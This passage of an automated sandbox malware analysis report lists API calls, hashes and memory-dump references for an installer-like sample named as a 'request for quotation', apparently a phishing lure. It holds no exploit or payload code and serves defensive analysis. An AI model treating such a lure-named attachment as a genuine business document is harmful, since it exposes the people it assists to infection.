                                                                                                                                • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                                                                • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                                                                • GetMessagePos.USER32 ref: 00404A81
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                • String ID: f
                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                                                                • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                                                APIs
                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                                • wsprintfW.USER32 ref: 00402CD1
                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                • API String ID: 1451636040-1158693248
                                                                                                                                • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                                                • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                                                APIs
                                                                                                                                • wsprintfW.USER32 ref: 100024E1
                                                                                                                                • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                                                                                                  • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,771AFFC0,100011AA,?,00000000), ref: 1000131E
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1661666940.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1661650069.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661681060.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661697008.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2435812281-0
                                                                                                                                • Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                                • Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
                                                                                                                                • Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                                • Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                  • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001928
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1661666940.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1661650069.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661681060.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661697008.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeGlobal$lstrcpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 176019282-0
                                                                                                                                • Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                • Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
                                                                                                                                • Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                • Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                                                • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                                                                                                • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1661666940.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1661650069.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661681060.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661697008.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1148316912-0
                                                                                                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                • Opcode ID: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                                                                • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                                                • Opcode Fuzzy Hash: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                                                                • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(?), ref: 00401D44
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                                • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                • Opcode ID: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                                                • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                                                • Opcode Fuzzy Hash: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                                                • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                                                • wsprintfW.USER32 ref: 00404A12
                                                                                                                                • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                                • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                                                • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                                • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                                                APIs
                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                • String ID: !
                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                                                • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DE1
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E02
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E25
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                • String ID: Call
                                                                                                                                • API String ID: 3677997916-1824292864
                                                                                                                                • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                                • Instruction ID: 2fd967afc3cf920b801d0ff69ba4d64ac6492d281fb7c7a5729fe10eb95daac3
                                                                                                                                • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                                • Instruction Fuzzy Hash: F4011A3255020AEADB219F56ED09EDB3BACEF85350F00403AF945D6260D335EA64DBF9
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 0040593B
                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 00405945
                                                                                                                                • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                                                                                Strings
                                                                                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405935
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                • API String ID: 2659869361-2382934351
                                                                                                                                • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                                • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                                                                                • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                                • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                                                                                APIs
